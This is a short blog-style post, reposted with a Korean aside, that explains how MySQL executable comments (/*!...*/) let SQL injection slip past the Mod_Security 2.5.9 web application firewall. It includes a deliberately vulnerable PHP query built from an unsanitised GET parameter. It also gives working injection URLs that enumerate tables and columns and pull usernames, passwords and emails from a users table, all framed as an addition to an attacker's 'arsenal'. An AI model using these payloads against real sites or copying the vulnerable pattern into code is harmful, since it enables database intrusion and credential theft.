언제 테스트 해보지..
method that I discovered today in
MySQL documentation struck me with its simplicity and the fact that I haven’t noticed it before. Let me describe this method of bypassing WAF.
MySQL servers allow one to use comments of the following type:
/*!sql-code*/ and
/*!12345sql-code*/
As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that "sql-code" should be executed only if the DBMS version is later than the given value.
As I have been repeatedly asserted [
1,
2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of
Mod_Security (v. 2.5.9).
Here is a simple example:
...
$query
= "SELECT name FROM table where id = ".$_GET
[id
];
$result
= mysql_query
($query
);
...
If a web application is protected with Mod_Security, then the following request will be forbidden:
/?id=1+union+select+1
It is remarkable that even these requests (that are incorrect in the considered example) will be also forbidden by the WAF (
HPP/
HPF techniques):
/?id=1+union/*&id=*/select+table_name+from+information_schema.columns
/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns

But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection:
/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
Well, one more method to our arsenal :-)